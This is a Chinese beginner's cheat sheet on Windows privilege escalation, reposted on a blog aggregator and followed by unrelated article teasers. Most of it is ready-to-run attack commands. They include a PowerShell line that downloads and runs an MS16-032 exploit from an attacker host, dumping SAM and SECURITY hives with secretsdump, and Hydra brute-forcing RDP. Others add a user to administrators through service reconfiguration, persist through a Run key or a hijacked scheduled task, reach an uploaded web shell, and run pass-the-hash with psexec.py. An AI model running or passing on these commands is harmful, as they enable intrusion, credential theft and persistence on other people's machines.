小白 | windows提权

news2024/12/23 17:55:45

 

1.CVE-2016-0099 (MS16-032)

这是一个Windows内核特权提升漏洞,利用该漏洞可以获得系统权限。

# 使用公开的POC进行利用,如
powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://<attacker_ip>/Invoke-MS16-032.ps1'); Invoke-MS16-032

2.CVE-2021-36934

也被称为HiveNightmare或SeriousSAM漏洞,通过不安全的SAM文件权限提升特权。

# 利用公开的POC
reg save HKLM\SYSTEM system.hive
reg save HKLM\SAM sam.hive
reg save HKLM\SECURITY security.hive
python3 secretsdump.py -sam sam.hive -system system.hive -security security.hive LOCAL

3.利用弱密码

尝试通过弱密码或默认密码进行暴力破解。

# 使用工具如Hydra进行暴力破解
hydra -l admin -P /usr/share/wordlists/rockyou.txt rdp://<target_ip>

4.Unquoted Service Path

某些服务在配置时路径未加引号,攻击者可以利用这些路径在系统路径中插入恶意可执行文件。

# 查找未加引号的服务路径
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
# 在漏洞路径中放置恶意可执行文件
copy malicious.exe "C:\Program Files\Vulnerable Service\malicious.exe"

5.Insecure Service Permissions

检查服务的权限设置,如果权限设置不当,普通用户可以修改服务配置或执行恶意代码。

# 使用accesschk工具检查服务权限
accesschk.exe -uwcqv "Authenticated Users" *
# 如果发现某服务权限不当,可以进行提权操作
sc config <service_name> binpath= "cmd.exe /c net localgroup administrators <username> /add"
sc stop <service_name>
sc start <service_name>

6.Task Scheduler

如果计划任务配置不当,可以修改任务以执行恶意代码。

# 列出计划任务
schtasks /query /fo LIST /v
# 修改任务执行恶意代码
schtasks /change /tn "\Microsoft\Windows\Backup\MyTask" /tr "C:\malicious.exe"

7.注册表启动项

修改注册表启动项,增加恶意代码。

# 使用reg命令修改注册表启动项
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Malicious /t REG_SZ /d "C:\malicious.exe" /f

8.利用IIS配置错误

通过文件上传漏洞上传Web Shell并执行。

# 上传Web Shell
# 在浏览器中访问Web Shell,执行系统命令
http://<target_ip>/uploads/webshell.aspx

10.Pass-the-Hash

利用哈希值直接进行身份验证,而无需明文密码。

# 使用impacket工具包中的psexec.py
psexec.py -hashes <NTLM_hash> <domain>/<user>@<target_ip>

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1831218.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Cesium加载Mapbox自定义地图

Cesium 加载影像地图&#xff0c;一般都是天地图&#xff0c;高德地图&#xff0c;必应地图&#xff0c;谷歌地图等。 如果真实项目中想要自定义地图的风格样式&#xff0c;为了配合相应的页面UI风格&#xff0c;这些公共免费的影像地图就满足不了需求。 但是MapBox可以支持自…

python之日志(三)--将捕获的异常写入日志中

1.日志级别 import logging #日志模块 #默认下只会从第3级开始打印 logging.debug(DEBUG级别) #1级 logging.info(INFO级别) #2级 logging.warning(WARNING级别) #3级 logging.error(ERROR级别) #4级 logging.critical(CRITICAL级别) #5级 默认第1和第2级的日志不会打印 …

原子阿波罗STM32F767程序的控制器改为STM32F407驱动LCD屏

由于手里没有原子大神的F429开发板&#xff0c;又还想学习原子大神的F429开发板程序&#xff0c;前几天&#xff0c;经过更换控制器&#xff0c;成功把原子大神的F429开发板程序用到了F407开发板上&#xff0c;驱动LCD屏显示成功&#xff0c;目的&#xff0c;就是熟悉原子大神的…

2024 年 5 月公链研报:监管调整与市场新动向

作者&#xff1a;stellafootprint.network 数据来源&#xff1a;公链 Research 页面 五月份&#xff0c;加密货币市场经历了重要的监管和政治动态。美国证券交易委员会&#xff08;SEC&#xff09;批准了现货以太坊 ETF 的初步申请文件&#xff0c;这一举措提振了以太坊及其…

2024年高考,应该选择哪些专业和学校?

2024年高考已经告一段落&#xff0c;目前&#xff0c;高考评卷工作正在有序进行&#xff0c;马上进入紧张时期的是考生如何选择院校&#xff0c;填报志愿。在分数限制下&#xff0c;选择哪些专业和好学校&#xff0c;需要综合考虑多个因素。以下是基于当前信息的一些建议&#…

环境科学SCI期刊,IF=8.5+,期刊发展势头非常好

一、期刊名称 SUSTAINABLE DEVELOPMENT 二、期刊简介概况 期刊类型&#xff1a;SCI 学科领域&#xff1a;环境科学与生态学 影响因子&#xff1a;8.562 中科院分区&#xff1a;2区 三、期刊征稿范围 该期刊是一本跨学科出版物&#xff0c;旨在解决和讨论实现可持续发展的…

看穿人性!现货白银交易的一些博弈心得

很多投资者认为现货白银交易最应该讲求的是交易技巧&#xff0c;但交易的技巧和套路是“死”的&#xff0c;行情走势却是“活”的&#xff0c;投资者需要在实践中不断地累积经验和总结心得&#xff0c;才能更加灵活地面对行情走势的变化&#xff0c;逐步达至盈利的理想彼岸。 无…

Python私教张大鹏 Vue3整合AntDesignVue之Form 表单

何时使用 用于创建一个实体或收集信息。 需要对输入的数据类型进行校验时。 表单 我们为 form 提供了以下三种排列方式&#xff1a; 水平排列&#xff1a;标签和表单控件水平排列&#xff1b;&#xff08;默认&#xff09; 垂直排列&#xff1a;标签和表单控件上下垂直排列…

js 实现将后端请求来的 Blob 数据保存到用户选择的任意目录

js实现将后端请求来的 Blob 数据保存到用户选择的任意目录 实现方式 实现方式 实现方式是使用 window 的 showSaveFilePicker 方法。Window 接口的 showSaveFilePicker() 方法用于显示一个文件选择器&#xff0c;以允许用户保存一个文件。可以选择一个已有文件覆盖保存&#xf…

一套上门家政小程序源码,java上门家政app源码,家政服务管理后台系统源代码

一套上门家政小程序源码&#xff0c;上门家政app源码&#xff0c;家政服务管理后台系统源码 家政上门系统开发端口组成&#xff1a;用户端app技工端apppc管理后台&#xff1a;Uniapp开发&#xff0c;系统可以打包&#xff1a;安卓、ios、h5、微信小程序、公众号。 一、用户端&…

Vue微前端架构与Qiankun实践理论指南

title: Vue微前端架构与Qiankun实践理论指南 date: 2024/6/15 updated: 2024/6/15 author: cmdragon excerpt: 这篇文章介绍了微前端架构概念&#xff0c;聚焦于如何在Vue.js项目中应用Qiankun框架实现模块化和组件化&#xff0c;以达到高效开发和维护的目的。讨论了Qiankun…

[数据集][实例分割]减速带分割数据集json+yolo格式5400张1类别

数据集格式&#xff1a;labelme格式(不包含mask文件&#xff0c;仅仅包含jpg图片和对应的json文件以及对应yolo格式txt) 图片数量(jpg文件个数)&#xff1a;5400 标注数量(json文件个数)&#xff1a;5400 标注数量(txt文件个数)&#xff1a;5400 标注类别数&#xff1a;1 标注…

Vim基础操作:常用命令、安装插件、在VS Code中使用Vim及解决Vim编辑键盘错乱

Vim模式 普通模式&#xff08;Normal Mode&#xff09;&#xff1a; 这是 Vim 的默认模式&#xff0c;用于执行文本编辑命令&#xff0c;如复制、粘贴、删除等。在此模式下&#xff0c;你可以使用各种 Vim 命令来操作文本。插入模式&#xff08;Insert Mode&#xff09;&#…

案例7.7_使用SFC/DISM工具修复系统

问题分享 用什么方法可以检测系统文件是否受损&#xff0c;又该如何修复呢?Windows 10操作系统可以用文件检查器检查和修复系统的受损文件&#xff0e;防范故障于未然。 &#xff08;1&#xff09;右击“开始”按钮.在弹出的快捷菜单中选择“命令提示符&#xff08;管理员&am…

全域推广和标准推广可以一起做吗?可行性分析结果如何?

作为全域时代的新赛道&#xff0c;全域推广从出现之日起便备受关注&#xff0c;许多创业者经常将其与标准推广进行对比或捆绑&#xff0c;类似于全域推广和标准推广的区别、全域推广和标准推广哪个好以及全域推广和标准推广可以一起做吗等问题也因此长期霸占该赛道相关话题榜单…

【docker实战】使用Dockerfile的COPY拷贝资源遇到的问题

事情是这样的。 在我负责的golang项目中&#xff0c;使用硬代码验证某块逻辑。比如&#xff1a; 于是&#xff0c;为了解决硬代码的问题&#xff0c;我制作了表格工具&#xff1a;【开源项目】Excel数据表自动生成工具v1.0版 – 经云的清净小站 (skycreator.top)。 使用表格工…

Pytorch深度解析:Transformer嵌入层源码逐行解读

前言 本部分博客需要先阅读博客&#xff1a; 《Transformer实现以及Pytorch源码解读&#xff08;一&#xff09;-数据输入篇》 作为知识储备。 Embedding使用方式 如下面的代码中所示&#xff0c;embedding一般是先实例化nn.Embedding(vocab_size, embedding_dim)。实例化的…

Comfy UI使用最新SD3模型,并解决报错‘NoneType‘ object has no attribute ‘tokenize‘【实测可行】

解决Comfy UI使用最新SD3模型报错’NoneType’ object has no attribute ‘tokenize’ 前几天SD3发布了&#xff0c;所以想着尝尝鲜&#xff0c;便去下载了SD3来玩一玩。使用的是Comfy UI而不是Stable Diffusion UI&#xff0c;这是一个比SD UI更加灵活的UI界面&#xff0c;使用…

【Gradio】Building With Blocks 块中的状 态 + 动态应用程序与渲染装饰器

State in Blocks 块中的状态 我们介绍了接口中的状态&#xff0c;这个指南将看看块中的状态&#xff0c;其工作原理大致相同。 全局状态 块中的全局状态与接口中的工作原理相同。在函数调用外创建的任何变量都是所有用户共享的引用。 会话状态 Gradio 支持会话状态&#xff…

大模型-人类病理学的语言视觉AI助手

论文摘要翻译与评论 论文标题&#xff1a; A Multimodal Generative AI Copilot for Human Pathology 摘要翻译&#xff1a; 计算病理学领域已经在任务特定的预测模型和任务无关的自监督视觉编码器的发展方面取得了显著进展。然而&#xff0c;尽管生成性人工智能快速增长&a…